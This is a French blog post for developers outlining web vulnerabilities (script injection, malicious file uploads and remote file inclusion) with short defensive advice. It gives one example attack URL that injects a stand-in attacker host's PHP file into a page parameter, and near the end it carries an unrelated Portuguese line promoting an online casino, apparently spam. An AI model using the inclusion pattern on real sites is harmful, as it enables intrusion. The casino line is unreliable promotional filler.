La sécurité web ?
Bonjour les codeurs! Savez-vous que l’on peut modifier votre front-end peux afficher du code HTML non prĂ©vue ? Ou que votre serveur peut exĂ©cuter des requĂȘtes que vous n’avez pas dĂ©finies ? Ou encore volĂ©e le mot de passe de vos utilisateurs a leur insu ? Et beaucoup autre chose. Aujourd’hui nous allons parler Ă  la fois d’un tout autre sujet aussi passionnant qu’effrayant mais que beaucoup dĂ©veloppeurs comme vous et moi prennent a la lĂ©gĂšre. Nous allons Ă©numĂ©rer quelques-unes de ses failles. Mais avant toute chose retenez ceci « NE JAMAIS FAIRE CONFIANCE AUX DONNEES ENREGISTRER PAR L’UTILISATEUR ».
<> : c’est une faille aussi veille que la naissance du web. Il s’agit tout simplement de mettre du code HTML, CSS et JavaScript dans les champs de saisies des formulaires ou des Url en espĂ©rant qu’il s’exĂ©cute une fois lorsque le serveur fera appel Ă  ses donnĂ©es. L’injection correspond bien Ă  une vulnĂ©rabilitĂ© oĂč des donnĂ©es externes modifient le comportement de l’application. Avec ce genre d’injection vous pouvez insĂ©rer du code JavaScript de tel sorte qu’il modifie le lien du formulaire site web d’origine pour que ce dernier redirige les infos de l’utilisateur vers votre page, voler les cookies et voler une session d’utilisateur et se connecter Ă  un compte sans mot de passe etc. Pour ce prĂ©munir contre cette attaque il faut tout simplement nettoyer le code des caractĂšres spĂ©ciaux.
<> il s’agit ici de tĂ©lĂ©charger un fichier corrompu sur un serveur et l’exĂ©cuter via Url ou via un appel distant. C’est la raison pour laquelle il faut vĂ©rifier le type de fichier que l’on reçoit sur notre serveur. Comme le type MIME est fourni par le navigateur, il est impossible de s’y fier car le pirate peut faire passer un fichier PHP pour une image. Le ‘type’ indiquĂ© dans la variable $_FILES doit ĂȘtre ignorĂ©. On ne peut pas non plus se fier Ă  l’extension du fichier chargĂ©. Parce qu’on peut faire passer un fichier PHP pour une image ou encore injecter du code PHP et JavaScript dans un fichier aussi inoffensif qu’une image(steganographie) et l’exĂ©cuter ou encore corrompre toute les donnĂ©es envoyĂ©es par le navigateur (avec de bons outils). A cet effet on ne peut pas toujours nous fier aux informations reçus par le navigateur. On peut utiliser des fonction tel que file_info(), getimagesize () etc. Comme faille des fichiers il y’a le dĂ©ni de service, l’écrasement de fichier, la taille de caractĂšres, les failles par noms de fichier etc.
<> C’est lĂ©gĂšrement diffĂ©rents de l’injection de fichier qui a pour but d’installer un fichier corrompus sur le serveur cible. Dans ce cas de figure il s’agit de mettre l’url du pirate dans l’url du site cible et le faire exĂ©cuter EX : www.example.com/?page=www.pirate.com/inject.php . Pour se prĂ©munir il faut se rassurer de l’origine des paramĂštres URL.
Nous pouvons aussi noter les attaques tel que CSRF, les failles lier aux configurations serveurs et des fonctions, les injections SQL dans les bases de donnĂ©es et bien d’autres.
SĂ©curitĂ© web est vaste et une publication ne saurait couvrir tout le sujet. Quoi qu’il en soit beaucoup ne dĂ©velopperons plus leur application de la mĂȘme maniĂšre car les risques vont de failles minimes tel que l’injection du code HTML a la prise de contrĂŽle de votre systĂšme et pourquoi pas son clonage et mĂȘme jusqu’à son effacement complet. Tout dĂ©pend des disposions de sĂ©curitĂ© mises en place

Esta plataforma carrega rĂĄpido e funciona de forma fluida onde quer que vocĂȘ esteja. A diversĂŁo começa na Funbet casino.

HAPPY CODIMG !😊😊😊😊😊

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *